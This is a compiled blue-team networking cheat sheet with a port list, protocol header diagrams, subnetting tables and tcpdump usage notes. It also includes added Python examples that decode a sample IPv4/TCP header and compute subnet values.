
edu.anarcho-copy.org IP - Network/BTCSwGSEnotes.pdf · i TABLE OF CONTENTS SECTION TITLE PAGE Table of Contents - Networking/Blue Team Tools



TABLE OF CONTENTS

SECTION TITLE PAGE

Table of Contents - Networking/Blue Team Tools ............................................................ i

Table of Contents - IR / Linux / Windows / Misc ............................................................... i

Table of Contents - Incident Response / Notes ................................................................ i

NETWORKING / BLUE TEAM TOOLS

Common Ports ...................................................................................................... 1

IPv4/TCP-UDP-ICMP Headers, Subnetting .......................................................... 2

IPv6/TCP Header ................................................................................................. 6

OSI Model ............................................................................................. 9

HTTP, FTP, Decimal to Hex Conversion ............................................................ 12

20 Critical Security Controls ............................................................................... 15

Cisco Networking All in One Reference .............................................................. 17

ARGUS/TCPDUMP/TSHARK/NGREP ............................................................... 21

Tcpdump ........................................................................................................... 23

Berkeley Packet Filters and Bit Masking ............................................................ 24

Wireshark ........................................................................................................... 27

NMAP ................................................................................................................. 30

Python Quick Reference .................................................................................... 34

Regular Expressions .......................................................................................... 36

SNORT ............................................................................................................... 38

rwfilter ................................................................................................................ 41



Scapy ................................................................................................................. 43

Bro ...................................................................................................................... 44

MISC TOOLS / CHEAT SHEETS

Google Hacking .................................................................................................. 52

Netcat ................................................................................................................. 54

Hping .................................................................................................................. 56

Metasploit ........................................................................................................... 57

WINDOWS

Useful Windows Commands, Reg, Netsh, Netstat, Loops .................................. 62

Intrusion Detection Cheat Sheets ....................................................................... 64

Windows Incident Response .............................................................................. 68

Windows Security Log Event IDs ........................................................................ 69

Powershell .......................................................................................................... 70

LINUX/UNIX

Linux Hardening ................................................................................................. 74

Basic Linux Commands ...................................................................................... 78

SSH Forwarding ................................................................................................. 80

Iptables ............................................................................................................... 83

Searching Through Files .................................................................................... 85

Cron .................................................................................................................... 88

VI Editor .............................................................................................................. 90

Remnux/Reverse Engineer Malware .................................................................. 94



INCIDENT RESPONSE/PICERL PER SITUATION

Worm Infection Response .................................................................................. 96

Windows Malware Detection .............................................................................. 98

Windows Intrusion Detection ............................................................................ 100

Website Defacement ........................................................................................ 102

Linux/Unix Intrusion Detection .......................................................................... 104

Malicious Network Behavior ............................................................................. 106

DDOS Incident Response ................................................................................ 108

Phishing Incident Response ............................................................................. 110

Social Engineering Incident Response ............................................................. 112

INCIDENT RESPONSE FORMS

Incident Communications Log .......................................................................... 115

Incident Contact List ......................................................................................... 116

Incident Identification ........................................................................................ 118

Incident Containment ........................................................................................ 119

Incident Eradication .......................................................................................... 120

Incident Survey ................................................................................................. 121

NOTES SECTION

Blank Pages for Note Taking ............................................................................ 122

DISCLAIMER: I only compiled this list of cheat sheets from other sources. As such, you will find reference to many different individuals or organizations that created these cheat sheets. I take no credit for any of their creations save for one or two that I did create. As such, the Blue Team Cheat Sheet book is completely free and open for use for anyone to have or edit. I merely brought them all together into one source.


COMMON PORTS packetlife.net

TCP/UDP Port Numbers

7 Echo

19 Chargen

20-21 FTP

22 SSH/SCP

23 Telnet

25 SMTP

42 WINS Replication

43 WHOIS

49 TACACS

53 DNS

67-68 DHCP/BOOTP

69 TFTP

70 Gopher

79 Finger

80 HTTP

88 Kerberos

102 MS Exchange

110 POP3

113 Ident

119 NNTP (Usenet)

123 NTP

135 Microsoft RPC

137-139 NetBIOS

143 IMAP4

161-162 SNMP

177 XDMCP

179 BGP

201 AppleTalk

264 BGMP

318 TSP

381-383 HP Openview

389 LDAP

411-412 Direct Connect

443 HTTP over SSL

445 Microsoft DS

464 Kerberos

465 SMTP over SSL

497 Retrospect

500 ISAKMP

512 rexec

513 rlogin

514 syslog

515 LPD/LPR

520 RIP

521 RIPng (IPv6)

540 UUCP

554 RTSP

546-547 DHCPv6

560 rmonitor

563 NNTP over SSL

587 SMTP

591 FileMaker

593 Microsoft DCOM

631 Internet Printing

636 LDAP over SSL

639 MSDP (PIM)

646 LDP (MPLS)

691 MS Exchange

860 iSCSI

873 rsync

902 VMware Server

989-990 FTP over SSL

993 IMAP4 over SSL

995 POP3 over SSL

1025 Microsoft RPC

1026-1029 Windows Messenger

1080 SOCKS Proxy

1080 MyDoom

1194 OpenVPN

1214 Kazaa

1241 Nessus

1311 Dell OpenManage

1337 WASTE

1433-1434 Microsoft SQL

1512 WINS

1589 Cisco VQP

1701 L2TP

1723 MS PPTP

1725 Steam

1741 CiscoWorks 2000

1755 MS Media Server

1812-1813 RADIUS

1863 MSN

1985 Cisco HSRP

2000 Cisco SCCP

2002 Cisco ACS

2049 NFS

2082-2083 cPanel

2100 Oracle XDB

2222 DirectAdmin

2302 Halo

2483-2484 Oracle DB

2745 Bagle.H

2967 Symantec AV

3050 Interbase DB

3074 XBOX Live

3124 HTTP Proxy

3127 MyDoom

3128 HTTP Proxy

3222 GLBP

3260 iSCSI Target

3306 MySQL

3389 Terminal Server

3689 iTunes

3690 Subversion

3724 World of Warcraft

3784-3785 Ventrilo

4333 mSQL

4444 Blaster

4664 Google Desktop

4672 eMule

4899 Radmin

5000 UPnP

5001 Slingbox

5001 iperf

5004-5005 RTP

5050 Yahoo! Messenger

5060 SIP

5190 AIM/ICQ

5222-5223 XMPP/Jabber

5432 PostgreSQL

5500 VNC Server

5554 Sasser

5631-5632 pcAnywhere

5800 VNC over HTTP

5900+ VNC Server

6000-6001 X11

6112 Battle.net

6129 DameWare

6257 WinMX

6346-6347 Gnutella

6500 GameSpy Arcade

6566 SANE

6588 AnalogX

6665-6669 IRC

6679/6697 IRC over SSL

6699 Napster

6881-6999 BitTorrent

6891-6901 Windows Live

6970 Quicktime

7212 GhostSurf

7648-7649 CU-SeeMe

8000 Internet Radio

8080 HTTP Proxy

8086-8087 Kaspersky AV

8118 Privoxy

8200 VMware Server

8500 Adobe ColdFusion

8767 TeamSpeak

8866 Bagle.B

9100 HP JetDirect

9101-9103 Bacula

9119 MXit

9800 WebDAV

9898 Dabber

9988 Rbot/Spybot

9999 Urchin

10000 Webmin

10000 BackupExec

10113-10116 NetIQ

11371 OpenPGP

12035-12036 Second Life

12345 NetBus

13720-13721 NetBackup

14567 Battlefield

15118 Dipnet/Oddbob

19226 AdminSecure

19638 Ensim

20000 Usermin

24800 Synergy

25999 Xfire

27015 Half-Life

27374 Sub7

28960 Call of Duty

31337 Back Orifice

33434+ traceroute

Legend

Chat

Encrypted

Gaming

Malicious

Peer to Peer

Streaming

IANA port assignments published at http://www.iana.org/assignments/port-numbers

by Jeremy Stretch v1.1



IP/TCP Header Cheat Sheet Each Block Represents 1 byte (8 bits) and double wide blocks count as 2 bytes etc...

Everything before the Dest. IP address is the IP header (Bold Text) and everything after is the TCP header (Italicized). Produced by Chris Davis.

|-----1 byte-----|----1 byte----|------------2 bytes---------|---------------------------4 bytes---------------------------|

1. IP version. The first four bits (1 hex digit) represent either IPv4 or IPv6. IHL is the IP header length and makes up the second 4 bits (1 nibble) of block 1. An IHL of 5 means the IP header length is 20 bytes (5 x 4). If the IHL is 6, the IP options field will be 4 bytes after the IP checksum.

2. TOS stands for Type of Service and has to do with prioritizing traffic. In this instance 00 means no prioritizing.

3. Packet size simply refers to the entire size of the packet, so that the router knows how much space in the buffer to allocate. E.g. "00 28" in hex would be 40 bytes.

4. IPID - Simply the identifier for the packet, so the receiving end knows how to organize the data.

5. Fragmentation - This field refers to how the packets are fragmented. In the first nibble, a value of "4" (as in 40 00) is Don't Fragment, "2" is Must Fragment, "8" is Reserved and "0" is the last fragment packet.

6. TTL - Time to live. In this case, "40" in hex would be a TTL of 64.

7. Encoding - Refers to the IP encoding (protocol) of this packet. In this instance the value is "06", which simply means TCP. Other values (all hex): 01 is ICMP, 11 is UDP, 02 is IGMP, 09 is IGRP, 2f is GRE, 32 is ESP, 33 is AH, 39 is SKIP, 58 is EIGRP, 59 is OSPF, 73 is L2TP.

8. Checksum of the IP header, used to validate that the header hasn't been changed.

9. Source IP address

10. Destination IP address

11. Source Port

12. Destination Port

13. The TCP Sequence number used by the transport layer to order data.

14. The Acknowledgment field is used to acknowledge receipt of data.

15. The TCP/HL is the TCP header length; "50" in hex is read as just "5" because we ignore the 0 in this instance. So a value of "5" means the TCP header length is 5 x 4 = 20 bytes.

16. TCP Flags Field. This is two hex digits (8 bits). Depending on which bits are turned on, it represents CWR, ECN-Echo, URG, ACK, PSH, RST, SYN or FIN. The bits are aligned as follows:

| C | E | U | A | P | R | S | F |

In this instance the hex characters are "11", which equates to 17 in decimal and has the following bits in this order:

| 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |

We can deduce that the ACK and FIN flags are set.

17. The TCP window size field shows the number of bytes that can be transferred to the destination before an ACK should be sent.

18. The TCP header checksum is used to validate the integrity of the TCP header field.

19. The urgent pointer field identifies the location of urgent data within the packet. In most cases it will be 00 00.

20. The TCP options field shown in the diagram is 4 bytes but can actually be 0-40 bytes. This field will often not exist; whether it does depends on the TCP/HL (refer to 15). Since the TCP header length here was only 20, the TCP header ended after the urgent pointer and there are no TCP options in this example. This is where the payload would start if there was one. The options are:

0 End of Options
1 No operation (pad)
2 Maximum segment size
3 Window scale
4 Selective ACK ok
8 Timestamp

Example packet, hex bytes with the field each belongs to (item numbers refer to the list above):

45            IP vers. | IHL                    (1)
00            TOS                               (2)
00 28         Packet length                     (3)
eb 66         IPID                              (4)
40 00         Flags/Fragmentation               (5)
40            TTL                               (6)
06            Encoding                          (7)
b4 ab         Checksum                          (8)
0a 0a 0a 80   Src IP Address                    (9)
d0 6d b5 c6   Dest. IP address                  (10)
b9 50         Src Port                          (11)
00 50         Dest. Port                        (12)
6c e5 9f 79   Sequence Number                   (13)
61 d8 31 a9   Acknowledgement Number            (14)
50            TCP/HL                            (15)
11            Flags                             (16)
75 40         Window Size                       (17)
9a d8         Checksum                          (18)
00 00         Urgent Pointer                    (19)
...           TCP Options or Start of Payload   (20)   Payload --->
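The decoding walked through in items 1-20 above, as an added example that is not part of the cheat sheet: the 40 header bytes are transcribed from the hex dump, the parser pulls out every field the sheet names, and the IP header checksum (item 8) is recomputed so a tampered header is caught. Function and constant names are this example's own.

```python
import struct

# Constructed input: the 40 header bytes from the cheat sheet above, transcribed
# from its hex dump (IPv4 header followed by a TCP header, no payload).
SAMPLE_HEX = (
    "45 00 00 28 eb 66 40 00 40 06 b4 ab 0a 0a 0a 80 d0 6d b5 c6 "
    "b9 50 00 50 6c e5 9f 79 61 d8 31 a9 50 11 75 40 9a d8 00 00"
)

# IP protocol numbers named in item 7, keyed by their decimal value.
PROTOCOLS = {1: "ICMP", 2: "IGMP", 6: "TCP", 9: "IGRP", 17: "UDP", 47: "GRE",
             50: "ESP", 51: "AH", 57: "SKIP", 88: "EIGRP", 89: "OSPF", 115: "L2TP"}

# TCP flag bits in the sheet's order | C | E | U | A | P | R | S | F |, MSB first.
TCP_FLAGS = ["CWR", "ECN-Echo", "URG", "ACK", "PSH", "RST", "SYN", "FIN"]


def ones_complement_checksum(data: bytes) -> int:
    """RFC 1071 checksum: one's-complement sum of 16-bit words, then complemented.
    Run over a header that already contains its checksum field, it returns 0
    when the header is intact."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                      # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_ipv4_tcp(raw: bytes) -> dict:
    """Walk the IPv4 header (items 1-10) and, for protocol 6, the TCP header
    (items 11-20), returning the decoded fields."""
    if len(raw) < 20:
        raise ValueError("IPv4 header needs at least 20 bytes")
    ver_ihl, tos, total_len, ipid, frag, ttl, proto, _cksum = struct.unpack("!BBHHHBBH", raw[:12])
    version, ihl = ver_ihl >> 4, (ver_ihl & 0x0F) * 4      # item 1: version nibble, IHL in 32-bit words
    if version != 4 or ihl < 20 or len(raw) < ihl:
        raise ValueError("not a complete IPv4 header (version=%d, IHL=%d bytes)" % (version, ihl))
    info = {
        "ihl_bytes": ihl,
        "tos": tos,                                         # item 2
        "total_length": total_len,                          # item 3
        "ipid": ipid,                                       # item 4
        "dont_fragment": bool(frag & 0x4000),               # item 5: "4" nibble = DF
        "more_fragments": bool(frag & 0x2000),              # item 5: "2" nibble
        "fragment_offset": frag & 0x1FFF,                   # low 13 bits, in 8-byte units
        "ttl": ttl,                                         # item 6
        "protocol": PROTOCOLS.get(proto, str(proto)),       # item 7
        "ip_checksum_ok": ones_complement_checksum(raw[:ihl]) == 0,   # item 8
        "src": ".".join(str(b) for b in raw[12:16]),        # item 9
        "dst": ".".join(str(b) for b in raw[16:20]),        # item 10
        "ip_options": raw[20:ihl],                          # present only when IHL > 5
    }
    if proto == 6 and len(raw) >= ihl + 20:
        sport, dport, seq, ack, off, flags, win, tcksum, urg = struct.unpack("!HHIIBBHHH", raw[ihl:ihl + 20])
        thl = (off >> 4) * 4                                # item 15: high nibble of "50" -> 5 words
        info.update({
            "sport": sport, "dport": dport,                 # items 11, 12
            "seq": seq, "ack": ack,                         # items 13, 14
            "tcp_header_bytes": thl,
            "tcp_flags": [n for i, n in enumerate(TCP_FLAGS) if flags & (0x80 >> i)],  # item 16
            "window": win,                                  # item 17
            "tcp_checksum": tcksum,                         # item 18 (needs pseudo-header + payload to verify)
            "urgent_pointer": urg,                          # item 19
            "tcp_options": raw[ihl + 20:ihl + thl],         # item 20: empty when TCP/HL is 5
        })
    return info


def parse_hex_dump(hex_text: str) -> dict:
    """Convenience wrapper for a space-separated hex dump like the one above."""
    return parse_ipv4_tcp(bytes.fromhex(hex_text))


if __name__ == "__main__":
    for key, value in parse_hex_dump(SAMPLE_HEX).items():
        print("%-18s %s" % (key, value))
```

The IP checksum of the sample verifies (b4 ab), so the dump is internally consistent; the TCP checksum is left as a raw value because it covers the pseudo-header and any payload, which the dump does not include.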



packetlife.net

by Jeremy Stretch v2.0

IPV4 SUBNETTING

Subnets

CIDR  Subnet Mask       Addresses       Wildcard
/32   255.255.255.255   1               0.0.0.0
/31   255.255.255.254   2               0.0.0.1
/30   255.255.255.252   4               0.0.0.3
/29   255.255.255.248   8               0.0.0.7
/28   255.255.255.240   16              0.0.0.15
/27   255.255.255.224   32              0.0.0.31
/26   255.255.255.192   64              0.0.0.63
/25   255.255.255.128   128             0.0.0.127
/24   255.255.255.0     256             0.0.0.255
/23   255.255.254.0     512             0.0.1.255
/22   255.255.252.0     1,024           0.0.3.255
/21   255.255.248.0     2,048           0.0.7.255
/20   255.255.240.0     4,096           0.0.15.255
/19   255.255.224.0     8,192           0.0.31.255
/18   255.255.192.0     16,384          0.0.63.255
/17   255.255.128.0     32,768          0.0.127.255
/16   255.255.0.0       65,536          0.0.255.255
/15   255.254.0.0       131,072         0.1.255.255
/14   255.252.0.0       262,144         0.3.255.255
/13   255.248.0.0       524,288         0.7.255.255
/12   255.240.0.0       1,048,576       0.15.255.255
/11   255.224.0.0       2,097,152       0.31.255.255
/10   255.192.0.0       4,194,304       0.63.255.255
/9    255.128.0.0       8,388,608       0.127.255.255
/8    255.0.0.0         16,777,216      0.255.255.255
/7    254.0.0.0         33,554,432      1.255.255.255
/6    252.0.0.0         67,108,864      3.255.255.255
/5    248.0.0.0         134,217,728     7.255.255.255
/4    240.0.0.0         268,435,456     15.255.255.255
/3    224.0.0.0         536,870,912     31.255.255.255
/2    192.0.0.0         1,073,741,824   63.255.255.255
/1    128.0.0.0         2,147,483,648   127.255.255.255
/0    0.0.0.0           4,294,967,296   255.255.255.255

Decimal to Binary

Subnet Mask          Wildcard
255   1111 1111      0     0000 0000
254   1111 1110      1     0000 0001
252   1111 1100      3     0000 0011
248   1111 1000      7     0000 0111
240   1111 0000      15    0000 1111
224   1110 0000      31    0001 1111
192   1100 0000      63    0011 1111
128   1000 0000      127   0111 1111
0     0000 0000      255   1111 1111

Subnet Proportion (figure: a /24 divided into /25, /26, /27, /28, /29, /30 and /30 blocks)

Classful Ranges

A 0.0.0.0 – 127.255.255.255

B 128.0.0.0 - 191.255.255.255

C 192.0.0.0 - 223.255.255.255

D 224.0.0.0 - 239.255.255.255

E 240.0.0.0 - 255.255.255.255

Reserved Ranges

RFC 1918 10.0.0.0 - 10.255.255.255

Localhost 127.0.0.0 - 127.255.255.255

RFC 1918 172.16.0.0 - 172.31.255.255

RFC 1918 192.168.0.0 - 192.168.255.255

Terminology

CIDR · Classless interdomain routing was developed to provide more granularity than legacy classful addressing; CIDR notation is expressed as /XX

VLSM · Variable-length subnet masks are an arbitrary length between 0 and 32 bits; CIDR relies on VLSMs to define routes
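The CIDR, Decimal to Binary and Classful/Reserved tables above, regenerated in code as an added example that is not part of the packetlife sheet: given a prefix length it produces the mask, address count and wildcard row; given a host address in CIDR form it reports network, broadcast, usable hosts, class and RFC 1918/loopback membership. Function names are this example's own; it relies on the standard ipaddress module.

```python
import ipaddress

# RFC 1918 private blocks and the loopback block from the Reserved Ranges table.
RFC1918 = [ipaddress.IPv4Network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
LOOPBACK = ipaddress.IPv4Network("127.0.0.0/8")


def subnet_row(prefix_len: int) -> dict:
    """One row of the CIDR table: mask, address count and wildcard for /prefix_len."""
    if not 0 <= prefix_len <= 32:
        raise ValueError("prefix length must be between 0 and 32")
    mask = (0xFFFFFFFF << (32 - prefix_len)) & 0xFFFFFFFF   # prefix_len one-bits, then zeros
    return {
        "cidr": "/%d" % prefix_len,
        "mask": str(ipaddress.IPv4Address(mask)),
        "addresses": 1 << (32 - prefix_len),
        "wildcard": str(ipaddress.IPv4Address(mask ^ 0xFFFFFFFF)),  # bitwise inverse of the mask
    }


def octet_to_binary(value: int) -> str:
    """224 -> '1110 0000', as written in the Decimal to Binary table."""
    if not 0 <= value <= 255:
        raise ValueError("octet must be between 0 and 255")
    bits = format(value, "08b")
    return bits[:4] + " " + bits[4:]


def classful(address: str) -> str:
    """Classful letter from the first octet, using the Classful Ranges table."""
    first = int(address.split(".")[0])
    for upper, letter in ((127, "A"), (191, "B"), (223, "C"), (239, "D")):
        if first <= upper:
            return letter
    return "E"


def describe(cidr: str) -> dict:
    """Network, broadcast, usable host count and reserved-range membership for a
    host address written in CIDR form (host bits may be set)."""
    net = ipaddress.IPv4Network(cidr, strict=False)
    # /31 and /32 have no separate network/broadcast addresses, so every address is usable.
    usable = net.num_addresses - 2 if net.prefixlen <= 30 else net.num_addresses
    return {
        "network": str(net.network_address),
        "broadcast": str(net.broadcast_address),
        "mask": str(net.netmask),
        "wildcard": str(net.hostmask),
        "usable_hosts": usable,
        "class": classful(str(net.network_address)),
        "rfc1918": any(net.subnet_of(block) for block in RFC1918),
        "loopback": net.subnet_of(LOOPBACK),
    }


if __name__ == "__main__":
    for p in (24, 26, 12):
        print(subnet_row(p))
    print(describe("10.10.10.200/25"))
```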



tcpdump Usage

tcpdump [-aenStvx] [-F file] [-i int] [-r file] [-s snaplen] [-w file] ['filter_expression']

-e   Display data link header.
-F   Filter expression in file.
-i   Listen on int interface.
-n   Don't resolve IP addresses.
-r   Read packets from file.
-s   Get snaplen bytes from each packet.
-S   Use absolute TCP sequence numbers.
-t   Don't print timestamp.
-v   Verbose mode.
-w   Write packets to file.
-x   Display in hex.
-X   Display in hex and ASCII.

Acronyms: All RFCs can be found at http://www.rfc-editor.org

UDP Header (bit numbers 0-31)

 0                  15 16                 31
 +--------------------+--------------------+
 |    Source Port     |  Destination Port  |
 +--------------------+--------------------+
 |       Length       |      Checksum      |
 +--------------------+--------------------+

UDP Header Information

Length: Number of bytes in entire datagram including header; minimum value = 8

Checksum: Covers pseudo-header and entire UDP datagram

Common UDP Well-Known Server Ports

7 echo               138 netbios-dgm
19 chargen           161 snmp
37 time              162 snmp-trap
53 domain            500 isakmp
67 bootps (DHCP)     514 syslog
68 bootpc (DHCP)     520 rip
69 tftp              33434 traceroute
137 netbios-ns

ARP (bit numbers 0-31)

 +---------------------------------+---------------------------------+
 |      Hardware Address Type      |      Protocol Address Type      |
 +----------------+----------------+---------------------------------+
 |  H/w Addr Len  | Prot. Addr Len |            Operation            |
 +----------------+----------------+---------------------------------+
 |                     Source Hardware Address                       |
 +---------------------------------+---------------------------------+
 |  Source Hardware Addr (cont.)   |     Source Protocol Address     |
 +---------------------------------+---------------------------------+
 |  Source Protocol Addr (cont.)   |     Target Hardware Address     |
 +---------------------------------+---------------------------------+
 |                 Target Hardware Address (cont.)                   |
 +-------------------------------------------------------------------+
 |                     Target Protocol Address                       |
 +-------------------------------------------------------------------+

ARP Parameters (for Ethernet and IPv4)

Hardware Address Type: 1 Ethernet; 6 IEEE 802 LAN

Protocol Address Type: 2048 IPv4 (0x0800)

Hardware Address Length: 6 for Ethernet/IEEE 802

Protocol Address Length: 4 for IPv4

Operation: 1 Request; 2 Reply

TCP/IP and tcpdump Pocket Reference Guide, Version July-2010. ISC@sans.org · www.sans.org · http://isc.sans.org

Courses & GIAC Certifications: FOR558 Network Forensics; MGT512 SANS Security Leadership Essentials For Managers with Knowledge Compression (GSLC); SEC401 SANS Security Essentials Bootcamp Style (GSEC); SEC502 Perimeter Protection In-Depth (GCFW); SEC503 Intrusion Detection In-Depth (GCIA); SEC556 Comprehensive Packet Analysis; SEC560 Network Penetration Testing & Ethical Hacking (GPEN).

The SANS Technology Institute (STI) offers two degree programs: MS in Information Security Management and MS in Information Security Engineering. If you have a bachelor's degree and 12 months of experience in information security, follow these easy steps to get started:

• Complete an application – downloadable at www.sans.edu/admissions/procedure.php

• Submit the employer recommendation – form is provided

• Have your college send sealed transcripts to STI

• Submit an application fee

Learn more at www.sans.edu. Contact us at info@sans.edu or (720) 941-4932



DNS Header (bit numbers 0-15)

 +-------------------------------------------+
 |             LENGTH (TCP ONLY)             |
 +-------------------------------------------+
 |                    ID                     |
 +----+--------+----+----+----+----+----+----+
 | QR | Opcode | AA | TC | RD | RA | Z |RCODE|
 +----+--------+----+----+----+----+----+----+
 |                  QDCOUNT                  |
 +-------------------------------------------+
 |                  ANCOUNT                  |
 +-------------------------------------------+
 |                  NSCOUNT                  |
 +-------------------------------------------+
 |                  ARCOUNT                  |
 +-------------------------------------------+
 |              Question Section             |
 +-------------------------------------------+
 |               Answer Section              |
 +-------------------------------------------+
 |             Authority Section             |
 +-------------------------------------------+
 |      Additional Information Section       |
 +-------------------------------------------+

DNS Parameters

Query/Response: 0 Query; 1 Response

Opcode: 0 Standard query (QUERY); 1 Inverse query (IQUERY); 2 Server status request (STATUS)

AA (1 = Authoritative Answer)

TC (1 = TrunCation)

RD (1 = Recursion Desired)

RA (1 = Recursion Available)

Z (Reserved; set to 0)

Response code: 0 No error; 1 Format error; 2 Server failure; 3 Non-existent domain (NXDOMAIN); 4 Query type not implemented; 5 Query refused

QDCOUNT (No. of entries in Question section)

ANCOUNT (No. of resource records in Answer section)

NSCOUNT (No. of name server resource records in Authority section)

ARCOUNT (No. of resource records in Additional Information section)

ICMP Header (bit numbers 0-31)

 +----------+----------+---------------------+
 |   Type   |   Code   |      Checksum       |
 +----------+----------+---------------------+
 |     Other message-specific information... |
 +-------------------------------------------+

Type Name/Codes (Code=0 unless otherwise specified)

0 Echo Reply
3 Destination Unreachable
    0 Net Unreachable
    1 Host Unreachable
    2 Protocol Unreachable
    3 Port Unreachable
    4 Fragmentation Needed & DF Set
    5 Source Route Failed
    6 Destination Network Unknown
    7 Destination Host Unknown
    8 Source Host Isolated
    9 Network Administratively Prohibited
    10 Host Administratively Prohibited
    11 Network Unreachable for TOS
    12 Host Unreachable for TOS
    13 Communication Administratively Prohibited
4 Source Quench
5 Redirect
    0 Redirect Datagram for the Network
    1 Redirect Datagram for the Host
    2 Redirect Datagram for the TOS & Network
    3 Redirect Datagram for the TOS & Host
8 Echo
9 Router Advertisement
10 Router Selection
11 Time Exceeded
    0 Time to Live exceeded in Transit
    1 Fragment Reassembly Time Exceeded
12 Parameter Problem
    0 Pointer indicates the error
    1 Missing a Required Option
    2 Bad Length
13 Timestamp
14 Timestamp Reply
15 Information Request
16 Information Reply
17 Address Mask Request
18 Address Mask Reply
30 Traceroute

PING (Echo/Echo Reply) (bit numbers 0-31)

 +---------------+---------------+-----------------------+
 | Type (8 or 0) |   Code (0)    |       Checksum        |
 +---------------+---------------+-----------------------+
 |          Identifier           |    Sequence Number    |
 +-------------------------------+-----------------------+
 |                        Data...                        |
 +-------------------------------------------------------+

IP Header (bit numbers 0-31)

 +---------+-------+-----------------+-------------------------------+
 | Version |  IHL  | Type of Service |         Total Length          |
 +---------+-------+-----------------+-------+-----------------------+
 |          Identification           | Flags |    Fragment Offset    |
 +-----------------+-----------------+-------+-----------------------+
 |  Time to Live   |    Protocol     |        Header Checksum        |
 +-----------------+-----------------+-------------------------------+
 |                          Source Address                           |
 +-------------------------------------------------------------------+
 |                        Destination Address                        |
 +-------------------------------------------------------------------+
 |                        Options (optional)                         |
 +-------------------------------------------------------------------+

IP Header Contents

Version: 4 = IP version 4

Internet Header Length: Number of 32-bit words in IP header; minimum value = 5 (20 bytes) & maximum value = 15 (60 bytes)

Type of Service (PreDTRCx)            --> Differentiated Services
  Precedence (000-111)                    000
  D (1 = minimize delay)                  0
  T (1 = maximize throughput)             0
  R (1 = maximize reliability)            0
  C (1 = minimize cost)                   1 = ECN capable
  x (reserved and set to 0)               1 = congestion experienced

Total Length: Number of bytes in packet; maximum length = 65,535

Flags (xDM): x (reserved and set to 0); D (1 = Don't Fragment); M (1 = More Fragments)

Fragment Offset: Position of this fragment in the original datagram, in units of 8 bytes

Protocol:
  1 ICMP      17 UDP      57 SKIP
  2 IGMP      47 GRE      88 EIGRP
  6 TCP       50 ESP      89 OSPF
  9 IGRP      51 AH       115 L2TP

Header Checksum: Covers IP header only

Addressing

  NET_ID                          RFC 1918 PRIVATE ADDRESSES
  0-127    Class A                10.0.0.0-10.255.255.255
  128-191  Class B                172.16.0.0-172.31.255.255
  192-223  Class C                192.168.0.0-192.168.255.255
  224-239  Class D (multicast)
  240-255  Class E (experimental)

  HOST_ID: 0 Network value; broadcast (old); 255 Broadcast

Options (0-40 bytes; padded to 4-byte boundary):
  0 End of Options list      68 Timestamp
  1 No operation (pad)       131 Loose source route
  7 Record route             137 Strict source route

TCP Header (bit numbers 0-31)

 +---------------------------------+---------------------------------+
 |           Source Port           |        Destination Port         |
 +---------------------------------+---------------------------------+
 |                          Sequence Number                          |
 +-------------------------------------------------------------------+
 |                       Acknowledgment Number                       |
 +--------+----------+-------------+---------------------------------+
 | Offset | Reserved |    Flags    |             Window              |
 +--------+----------+-------------+---------------------------------+
 |            Checksum             |          Urgent Pointer         |
 +---------------------------------+---------------------------------+
 |                        Options (optional)                         |
 +-------------------------------------------------------------------+

Common TCP Well-Known Server Ports

7 echo               110 pop3
19 chargen           111 sunrpc
20 ftp-data          119 nntp
21 ftp-control       139 netbios-ssn
22 ssh               143 imap
23 telnet            179 bgp
25 smtp              389 ldap
53 domain            443 https (ssl)
79 finger            445 microsoft-ds
80 http              1080 socks

TCP Header Contents

Offset (Header Length): Number of 32-bit words in TCP header; minimum value = 5

Reserved: 4 bits; set to 0

Flags (CEUAPRSF):
  ECN bits (used when ECN employed; else 00):
    CWR (1 = sender has cut congestion window in half)
    ECN-Echo (1 = receiver cuts congestion window in half)
  U (1 = Consult urgent pointer, notify server application of urgent data)
  A (1 = Consult acknowledgement field)
  P (1 = Push data)
  R (1 = Reset connection)
  S (1 = Synchronize sequence numbers)
  F (1 = no more data; Finish connection)

Checksum: Covers pseudoheader and entire TCP segment

Urgent Pointer: Offset pointer to urgent data

Options:
  0 End of Options list      3 Window scale
  1 No operation (pad)       4 Selective ACK ok
  2 Maximum segment size     8 Timestamp



IPv6/TCP Header Cheat Sheet

<-----1 byte-----|-------1 byte------|------------------2 bytes----------------|---------------------------------------4 bytes------------------------------------> Developed By Christopher Davis

1. IP Version

2. Traffic Class

3. Flow Label

4. Payload Length

5. Next Header

6. Hop Limit

7. Source IP Address - ff21:50a0:80f0:7fde:db0:c021:90:a112

8. Destination IP Address - ff18:808:8::9f

11. Source Port

12. Destination Port

13. The TCP Sequence number used by the transport layer to order data.

14. The Acknowledgment field is used to acknowledge receipt of data.

15. The TCP/HL is the TCP header length; "50" in hex is read as just "5" because we ignore the 0 in this instance. So a value of "5" means the TCP header length is 5 x 4 = 20 bytes.

16. TCP Flags Field. This is two hex digits (8 bits). Depending on which bits are turned on, it represents CWR, ECN-Echo, URG, ACK, PSH, RST, SYN or FIN. The bits are aligned as follows:

| C | E | U | A | P | R | S | F |

In this instance the hex characters are "11", which equates to 17 in decimal and has the following bits in this order:

| 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |

We can deduce that the ACK and FIN flags are set.

17. The TCP window size field shows the number of bytes that can be transferred to the destination before an ACK should be sent.

18. The TCP header checksum is used to validate the integrity of the TCP header field.

19. The urgent pointer field identifies the location of urgent data within the packet. In most cases it will be 00 00.

20. The TCP options field shown in the diagram is 4 bytes but can actually be 0-40 bytes. This field will often not exist; whether it does depends on the TCP/HL (refer to 15). Since the TCP header length here was only 20, the TCP header ended after the urgent pointer and there are no TCP options in this example. This is where the payload starts if no options are present.

Example packet, hex bytes with the field each belongs to:

60 00 00 00 00 34 06 40                      Ver (6) | Traffic Class (00) | Flow Label (00000) | Payload Length (0034) | Next Header (06) | Hop Limit (40)

ff 21 50 a0 80 f0 7f de 0d b0 c0 21 00 90 a1 12    Source IP Address

ff 18 08 08 08 00 00 00 00 00 00 00 00 00 00 9f    Destination IP address

a3 e0 05 0c f6 f9 d9 c0                      Src Port | Dest Port | Sequence Number | Acknowledgement Num

00 00 50 11 f0 21 6f f5                      Ack Num cont. | TCP/HL | Flags | Window Size | Checksum

00 00 af c0 21 6f f5 9c                      Urgent Pointer | TCP Options or Payload | Payload



packetlife.net

by Jeremy Stretch v2.0

IPv6 Protocol Header

Bit offsets: 8 16 24 32

Ver | Traffic Class | Flow Label
